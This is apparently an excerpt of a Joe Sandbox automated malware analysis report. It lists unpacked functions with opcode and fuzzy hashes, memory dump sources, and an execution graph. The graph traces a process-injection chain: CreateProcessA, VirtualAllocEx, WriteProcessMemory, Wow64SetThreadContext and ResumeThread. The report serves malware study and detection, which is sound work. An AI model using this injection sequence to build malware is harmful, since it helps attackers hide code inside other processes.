                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b70ae374c4a04078afad570e68ffbeed8bcac326588f87e6668e9d94799fe854
                                                                                      • Instruction ID: 7be00e0756f4287550e36f28eb2bc157661322050535ced66975b6c058ab7b31
                                                                                      • Opcode Fuzzy Hash: b70ae374c4a04078afad570e68ffbeed8bcac326588f87e6668e9d94799fe854
                                                                                      • Instruction Fuzzy Hash: 16118E31B101299FDB55AA68DC14AAF73EBEBC9714F00453AD90AE7344EE699C028BD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06483FC9 Relevance: .1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0fb0e855087a3e6f9794f4837545d911682f62833f2a12d12f6712bff5796525
                                                                                      • Instruction ID: 6f13601ee9d80debff2bb4f2d2e87f4938a7d5e7364f33d3cb186373a06c4c93
                                                                                      • Opcode Fuzzy Hash: 0fb0e855087a3e6f9794f4837545d911682f62833f2a12d12f6712bff5796525
                                                                                      • Instruction Fuzzy Hash: 2201B532B104255FDB65A668DC10AEF72AEDBC9610F004136E50AD7344EE649C0287E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648F1BA Relevance: .1, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 082cdeb052ec232e895b192e30c050202d1b3e327401162c732a882ed8d88c51
                                                                                      • Instruction ID: 1cdce36ec78ba6852e264d0d00335e67b66c0f4816eacf8349142390894a7dba
                                                                                      • Opcode Fuzzy Hash: 082cdeb052ec232e895b192e30c050202d1b3e327401162c732a882ed8d88c51
                                                                                      • Instruction Fuzzy Hash: C001F530B041501FDB56A6BCD85072F77EADBCA654F14846BE509CB341DE25DC0683E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06483C90 Relevance: .1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cfd26b81af3bdadc500c8cfe90222ea6651867bb7485ce87f4f97ffa27bed3e4
                                                                                      • Instruction ID: 029e09fe3710b0cef73b23b76309f12e1ab270700dfcb5d5bbc6bebbcb858954
                                                                                      • Opcode Fuzzy Hash: cfd26b81af3bdadc500c8cfe90222ea6651867bb7485ce87f4f97ffa27bed3e4
                                                                                      • Instruction Fuzzy Hash: 5021BFB5901259EFCB10DF9AD884ACEFFF8FB48310F10812AE958A7240C375A954CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648A312 Relevance: .1, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b7aa2cbc98898fb91c01eab5fee2cbfa00b4fb3ff7972749b55037b839c273c7
                                                                                      • Instruction ID: 730363bfb66a91f5f71e0f211309a62a6b058704d81e38edfb9e8dfe8d70fde1
                                                                                      • Opcode Fuzzy Hash: b7aa2cbc98898fb91c01eab5fee2cbfa00b4fb3ff7972749b55037b839c273c7
                                                                                      • Instruction Fuzzy Hash: 8F018430B015105FDB62E67CE850B2FBBD9EB87714F1484BBE50AC7751DA25DC428791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00B7D03F Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4118257509.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_b7d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction ID: 741a7e55d15d60c9973da3e48aeb494857abb15eda7bfdc1cbdf30666b038d52
                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction Fuzzy Hash: 8611BB75504284CFCB11CF10C9C4B16BFB2FB84314F28C6AAD8494B652C33AD84ACB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06483C98 Relevance: .1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2530695c808189c04176bdfcbaf86322065c7794e87d4b2e4cb87c5355d522d3
                                                                                      • Instruction ID: 861e2943e9bca02088bb181518aeda8fc6bb8adb8a402aab7e25868300cf9770
                                                                                      • Opcode Fuzzy Hash: 2530695c808189c04176bdfcbaf86322065c7794e87d4b2e4cb87c5355d522d3
                                                                                      • Instruction Fuzzy Hash: 8D11AFB5D01259AFCB00DF9AD884ADEFBF4FB48724F10812AE918A7240C374A954CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06484220 Relevance: .1, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ef21a0a889b58d5dec49d9a0321410ecaa1f6f3d7ca759897817cdacb773b20e
                                                                                      • Instruction ID: 703633b5dbebd9273e3e20d9ad925735c9374b02a67e2e5387fc5e352a34e1f2
                                                                                      • Opcode Fuzzy Hash: ef21a0a889b58d5dec49d9a0321410ecaa1f6f3d7ca759897817cdacb773b20e
                                                                                      • Instruction Fuzzy Hash: 3401D131B100110FDB65A6BDA450B6FA7DBDBC9750F10883BE10EC7740EE29DC028385
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648F1C8 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9373a347887cd0efb66a69c4377bc1356e94527e2bab7744edf7befaf31c74ba
                                                                                      • Instruction ID: 21cc7f016ab74cdbe06d61cd99edba05c0f647c07cb74ca39860839430e178b3
                                                                                      • Opcode Fuzzy Hash: 9373a347887cd0efb66a69c4377bc1356e94527e2bab7744edf7befaf31c74ba
                                                                                      • Instruction Fuzzy Hash: B1018135F100101FDBA6A6BDD85072F66DADBC9754F14843AE50ACB340DE65DC0683D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648A320 Relevance: .0, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4a5c68a6a7c2d748783be132efa92f71e54843f03ff964464a380dd20cb3272f
                                                                                      • Instruction ID: 72511c91f364bc2fc90f952bad10ea7c3fd820f9ea5fbc0dc7044ccfb18c7554
                                                                                      • Opcode Fuzzy Hash: 4a5c68a6a7c2d748783be132efa92f71e54843f03ff964464a380dd20cb3272f
                                                                                      • Instruction Fuzzy Hash: 6701A430B104109FCB52E6BDE450B1FB3DAEB8A714F10887BE50AC7754DA65DC428781
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648C7E8 Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4dc6c4095fa3504e29a764fb920f4c74c2eea7581d55fa9e3cd3b39e2114a687
                                                                                      • Instruction ID: b4ba4b162c163a8bce00e950b2d14d51acec9f0f35e12ee9fe825afbcd1999c5
                                                                                      • Opcode Fuzzy Hash: 4dc6c4095fa3504e29a764fb920f4c74c2eea7581d55fa9e3cd3b39e2114a687
                                                                                      • Instruction Fuzzy Hash: 0FF02431A22224ABDB146A35EC409EFB73AEB80761F10416AEE11A7305CB229C01C7E0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06486481 Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 14651ce79f927a2b8f5a22cdabc34009b2781d3f61845897d9e4764fec0fc0ab
                                                                                      • Instruction ID: 86ce0581a5ca0e80b5e4fdb47d135cde1a1f1b1e0de0755636bd9756c0e47257
                                                                                      • Opcode Fuzzy Hash: 14651ce79f927a2b8f5a22cdabc34009b2781d3f61845897d9e4764fec0fc0ab
                                                                                      • Instruction Fuzzy Hash: 62F0E530905208AFDB92EF64C95479F77ADDB42214F224492D408CB202D132DA4AC795
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 064876A8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2222239885
                                                                                      • Opcode ID: 84e200bcb780c9b223a34d05f9b11970e36078f3a37033bfb56cf318bb9ce5ac
                                                                                      • Instruction ID: a7c3112c01fbabcf69449c21870a9cfa10ea616a8fa5222e25205b61c0aac325
                                                                                      • Opcode Fuzzy Hash: 84e200bcb780c9b223a34d05f9b11970e36078f3a37033bfb56cf318bb9ce5ac
                                                                                      • Instruction Fuzzy Hash: 56123E30E002198FDB65EF65C954A9EB7F2FF88304F2085AAD509AB355DB349D86CF81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648A948 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-3823777903
                                                                                      • Opcode ID: 1e8621e049b28755d15213c4058f7e190646d334f8a053ed60bab4b5b7070c99
                                                                                      • Instruction ID: 58daf23283d914f867926d1573c76e319970e5e05a5aa0088560f46d08f703d4
                                                                                      • Opcode Fuzzy Hash: 1e8621e049b28755d15213c4058f7e190646d334f8a053ed60bab4b5b7070c99
                                                                                      • Instruction Fuzzy Hash: 5E915C30A00209DFDB69EF64DA54B6EBBF2FF84300F14852BE4019B355DBB59985CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 064870A8 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-390881366
                                                                                      • Opcode ID: 3a8480ab2ff34145598d659f800a905bfb04e20ccec5dcaf16e07a232435d4c2
                                                                                      • Instruction ID: b9a16f09870f4811e0110378fb478f8f8019771f784d8d4e57fa1ab2302ca3ae
                                                                                      • Opcode Fuzzy Hash: 3a8480ab2ff34145598d659f800a905bfb04e20ccec5dcaf16e07a232435d4c2
                                                                                      • Instruction Fuzzy Hash: 06F15230B00209CFDB59EF69D594A6EBBB2FF88301F24856AD4059B369DB35DC46CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 064883E0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2125118731
                                                                                      • Opcode ID: ae65cd8bb3e9a17bb323327ed32e9e6156578a34de4d20fa405587ce5be4c332
                                                                                      • Instruction ID: 7be0082e90baad6864f0d02cb5f4f2891171c373cb63aa51fae70864916698ad
                                                                                      • Opcode Fuzzy Hash: ae65cd8bb3e9a17bb323327ed32e9e6156578a34de4d20fa405587ce5be4c332
                                                                                      • Instruction Fuzzy Hash: 28B14B30B10208CFDB55EF68D994A5EB7B2FF84304F64886AD406AB359DB35DC86CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 064887F8 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LR^q$LR^q$$^q$$^q
                                                                                      • API String ID: 0-2454687669
                                                                                      • Opcode ID: ae682910fb6467bb12e7c32c39af0072e39e43c23c0e4345b4987e4b6e6568f0
                                                                                      • Instruction ID: d2aafebebd17350c69f909ef9c5bbc20df89067be9b4b1779df5fba88b6b1b1b
                                                                                      • Opcode Fuzzy Hash: ae682910fb6467bb12e7c32c39af0072e39e43c23c0e4345b4987e4b6e6568f0
                                                                                      • Instruction Fuzzy Hash: E8519230B002059FDB59FF68D954A6EB7E2FF88700F1485AAE4069B3A5DB30EC45CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648ACD2 Relevance: 5.2, Strings: 4, Instructions: 167COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2125118731
                                                                                      • Opcode ID: b23c2a947304aa9094c0bdd69c13bb565f0de5291c9bd1dd262d65c7768494fd
                                                                                      • Instruction ID: cd0eeee5fe7a5cd08ed22364be0de4a330963fe569b97367c265df8bda059a59
                                                                                      • Opcode Fuzzy Hash: b23c2a947304aa9094c0bdd69c13bb565f0de5291c9bd1dd262d65c7768494fd
                                                                                      • Instruction Fuzzy Hash: 1A518E30E102049FDB66EB68D984A6EB7F2EB84301F24896BD805DB355DB75DC86CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:8.3%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:127
                                                                                      Total number of Limit Nodes:4
                                                                                      execution_graph 27046 6ee1a1c 27050 6ee34a8 27046->27050 27066 6ee34e0 27046->27066 27047 6ee1a30 27051 6ee34fa 27050->27051 27063 6ee351e 27051->27063 27082 6ee38ef 27051->27082 27087 6ee3cf1 27051->27087 27095 6ee3ad0 27051->27095 27100 6ee40f5 27051->27100 27105 6ee3e55 27051->27105 27109 6ee3d16 27051->27109 27116 6ee3d7b 27051->27116 27120 6ee429f 27051->27120 27124 6ee3c00 27051->27124 27128 6ee3fa0 27051->27128 27132 6ee3b23 27051->27132 27137 6ee3a64 27051->27137 27142 6ee3cad 27051->27142 27063->27047 27067 6ee34fa 27066->27067 27068 6ee38ef 2 API calls 27067->27068 27069 6ee3cad 2 API calls 27067->27069 27070 6ee351e 27067->27070 27071 6ee3a64 2 API calls 27067->27071 27072 6ee3b23 2 API calls 27067->27072 27073 6ee3fa0 2 API calls 27067->27073 27074 6ee3c00 2 API calls 27067->27074 27075 6ee429f 2 API calls 27067->27075 27076 6ee3d7b 2 API calls 27067->27076 27077 6ee3d16 4 API calls 27067->27077 27078 6ee3e55 2 API calls 27067->27078 27079 6ee40f5 2 API calls 27067->27079 27080 6ee3ad0 2 API calls 27067->27080 27081 6ee3cf1 2 API calls 27067->27081 27068->27070 27069->27070 27070->27047 27071->27070 27072->27070 27073->27070 27074->27070 27075->27070 27076->27070 27077->27070 27078->27070 27079->27070 27080->27070 27081->27070 27083 6ee38f5 27082->27083 27147 6ee13c5 27083->27147 27151 6ee13d0 27083->27151 27088 6ee3cae 27087->27088 27089 6ee39e0 27087->27089 27092 6ee1231 ReadProcessMemory 27088->27092 27155 6ee1238 27088->27155 27090 6ee3e44 27089->27090 27093 6ee1238 ReadProcessMemory 27089->27093 27159 6ee1231 27089->27159 27090->27063 27092->27089 27093->27089 27096 6ee3ae2 27095->27096 27097 6ee3985 27096->27097 27163 6ee1088 27096->27163 27167 6ee1080 27096->27167 27097->27063 27101 6ee4186 27100->27101 27171 6ee0fb0 27101->27171 27175 6ee0fa8 27101->27175 27102 6ee41a1 27106 6ee3d9b 27105->27106 27106->27105 27179 6ee0ef9 27106->27179 27183 6ee0f00 27106->27183 27112 6ee0fa8 Wow64SetThreadContext 27109->27112 27113 6ee0fb0 Wow64SetThreadContext 27109->27113 27110 6ee4107 27110->27063 27111 6ee3d30 27111->27110 27114 6ee0ef9 ResumeThread 27111->27114 27115 6ee0f00 ResumeThread 27111->27115 27112->27111 27113->27111 27114->27111 27115->27111 27117 6ee3d9a 27116->27117 27118 6ee0ef9 ResumeThread 27117->27118 27119 6ee0f00 ResumeThread 27117->27119 27118->27117 27119->27117 27187 6ee1148 27120->27187 27191 6ee1140 27120->27191 27121 6ee3f75 27121->27120 27125 6ee3c0d 27124->27125 27126 6ee0ef9 ResumeThread 27125->27126 27127 6ee0f00 ResumeThread 27125->27127 27126->27125 27127->27125 27130 6ee1148 WriteProcessMemory 27128->27130 27131 6ee1140 WriteProcessMemory 27128->27131 27129 6ee3fce 27129->27063 27130->27129 27131->27129 27133 6ee3a90 27132->27133 27134 6ee3ab1 27133->27134 27135 6ee1148 WriteProcessMemory 27133->27135 27136 6ee1140 WriteProcessMemory 27133->27136 27134->27063 27135->27134 27136->27134 27138 6ee3a6a 27137->27138 27140 6ee1148 WriteProcessMemory 27138->27140 27141 6ee1140 WriteProcessMemory 27138->27141 27139 6ee3ab1 27139->27063 27140->27139 27141->27139 27143 6ee39e0 27142->27143 27145 6ee1238 ReadProcessMemory 27142->27145 27146 6ee1231 ReadProcessMemory 27142->27146 27143->27142 27144 6ee3e44 27143->27144 27144->27063 27145->27143 27146->27143 27148 6ee1459 CreateProcessA 27147->27148 27150 6ee161b 27148->27150 27150->27150 27152 6ee1459 CreateProcessA 27151->27152 27154 6ee161b 27152->27154 27156 6ee1283 ReadProcessMemory 27155->27156 27158 6ee12c7 27156->27158 27158->27089 27160 6ee1236 ReadProcessMemory 27159->27160 27162 6ee12c7 27160->27162 27162->27089 27164 6ee10c8 VirtualAllocEx 27163->27164 27166 6ee1105 27164->27166 27166->27096 27168 6ee1088 VirtualAllocEx 27167->27168 27170 6ee1105 27168->27170 27170->27096 27172 6ee0ff5 Wow64SetThreadContext 27171->27172 27174 6ee103d 27172->27174 27174->27102 27176 6ee0fb0 Wow64SetThreadContext 27175->27176 27178 6ee103d 27176->27178 27178->27102 27180 6ee0f00 ResumeThread 27179->27180 27182 6ee0f71 27180->27182 27182->27106 27184 6ee0f40 ResumeThread 27183->27184 27186 6ee0f71 27184->27186 27186->27106 27188 6ee1190 WriteProcessMemory 27187->27188 27190 6ee11e7 27188->27190 27190->27121 27192 6ee1148 WriteProcessMemory 27191->27192 27194 6ee11e7 27192->27194 27194->27121 27021 227d9f8 27024 227daf0 27021->27024 27022 227da07 27025 227db01 27024->27025 27028 227db24 27024->27028 27033 227ce40 27025->27033 27028->27022 27029 227db1c 27029->27028 27030 227dd28 GetModuleHandleW 27029->27030 27031 227dd55 27030->27031 27031->27022 27034 227dce0 GetModuleHandleW 27033->27034 27036 227db0c 27034->27036 27036->27028 27037 227dd88 27036->27037 27038 227ce40 GetModuleHandleW 27037->27038 27039 227dd9c 27038->27039 27040 227ddc1 27039->27040 27042 227cea8 27039->27042 27040->27029 27043 227df48 LoadLibraryExW 27042->27043 27045 227dfc1 27043->27045 27045->27040

                                                                                      Executed Functions

                                                                                      Function 06A50E9B Relevance: 1.6, Strings: 1, Instructions: 359COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 329 6a50e9b-6a50ea4 330 6a50ea5-6a50ee8 329->330 331 6a50e6e-6a50e98 330->331 332 6a50eea-6a50f15 330->332 331->330 334 6a50f17 332->334 335 6a50f1c-6a50f58 332->335 334->335 405 6a50f5a call 6a51520 335->405 406 6a50f5a call 6a51530 335->406 337 6a50f60 338 6a50f67-6a50f83 337->338 339 6a50f85 338->339 340 6a50f8c-6a50f8d 338->340 339->337 341 6a50f92-6a50fa9 339->341 342 6a5131c-6a5132f 339->342 343 6a512ec-6a512f0 339->343 344 6a5122f-6a5124f 339->344 345 6a5112f-6a5114f 339->345 346 6a5116e-6a51172 339->346 347 6a510ee-6a51100 339->347 348 6a51069-6a51075 339->348 349 6a50fab-6a50faf 339->349 350 6a512b4-6a512cb 339->350 351 6a511b8-6a511cc 339->351 352 6a510ba-6a510c6 339->352 353 6a51205-6a51211 339->353 354 6a51105-6a51111 339->354 355 6a51044-6a51064 339->355 356 6a5100f-6a51018 339->356 357 6a5128b-6a51298 339->357 358 6a51154-6a51169 339->358 359 6a51254-6a51260 339->359 360 6a511d1-6a511dd 339->360 361 6a512d0-6a512e7 339->361 362 6a5129d-6a512af 339->362 363 6a5119e-6a511b3 339->363 364 6a50fd8-6a50fe4 339->364 340->341 340->342 341->338 377 6a51303-6a5130a 343->377 378 6a512f2-6a51301 343->378 344->338 345->338 381 6a51185-6a5118c 346->381 382 6a51174-6a51183 346->382 347->338 383 6a51077 348->383 384 6a5107c-6a51092 348->384 371 6a50fb1-6a50fc0 349->371 372 6a50fc2-6a50fc9 349->372 350->338 351->338 367 6a510cd-6a510e9 352->367 368 6a510c8 352->368 365 6a51213 353->365 366 6a51218-6a5122a 353->366 373 6a51113 354->373 374 6a51118-6a5112a 354->374 355->338 379 6a5102b-6a51032 356->379 380 6a5101a-6a51029 356->380 357->338 358->338 369 6a51267-6a51286 359->369 370 6a51262 359->370 385 6a511e4 360->385 386 6a511df 360->386 361->338 362->338 363->338 375 6a50fe6 364->375 376 6a50feb-6a5100a 364->376 365->366 366->338 367->338 368->367 369->338 370->369 388 6a50fd0-6a50fd6 371->388 372->388 373->374 374->338 375->376 376->338 387 6a51311-6a51317 377->387 378->387 390 6a51039-6a5103f 379->390 380->390 393 6a51193-6a51199 381->393 382->393 383->384 402 6a51094 384->402 403 6a51099-6a510b5 384->403 396 6a511ee-6a51200 385->396 386->385 387->338 388->338 390->338 393->338 396->338 402->403 403->338 405->337 406->337
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tIh
                                                                                      • API String ID: 0-443931868
                                                                                      • Opcode ID: 2efabd8c792506c037efa42d0008bdd87c40dab2d0f41f3900de3c539ba2894a
                                                                                      • Instruction ID: 4015ce35f6efc5458ff1366b8eeb71ec7eb574775af158263820f5c75e2cfddb
                                                                                      • Opcode Fuzzy Hash: 2efabd8c792506c037efa42d0008bdd87c40dab2d0f41f3900de3c539ba2894a
                                                                                      • Instruction Fuzzy Hash: 3DE18C70D1520ADFDB48EFA9C5818EEFBB2FF89300B11D159E815AB205D7349A42CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A50EF0 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tIh
                                                                                      • API String ID: 0-443931868
                                                                                      • Opcode ID: 49087b83a7ceb83e34f1aa060d0ab5c839d31bea658d05126ae1ef9a0486afdb
                                                                                      • Instruction ID: 8679064c5a68c89fe9f33c941aea91db738f5a286b32d01a6fa447a3c8c90ed3
                                                                                      • Opcode Fuzzy Hash: 49087b83a7ceb83e34f1aa060d0ab5c839d31bea658d05126ae1ef9a0486afdb
                                                                                      • Instruction Fuzzy Hash: 4CD15B70D1520ADFDB48DF9AC5858AEFBB2FF88300B11D559E815AB214D734EA42CF94
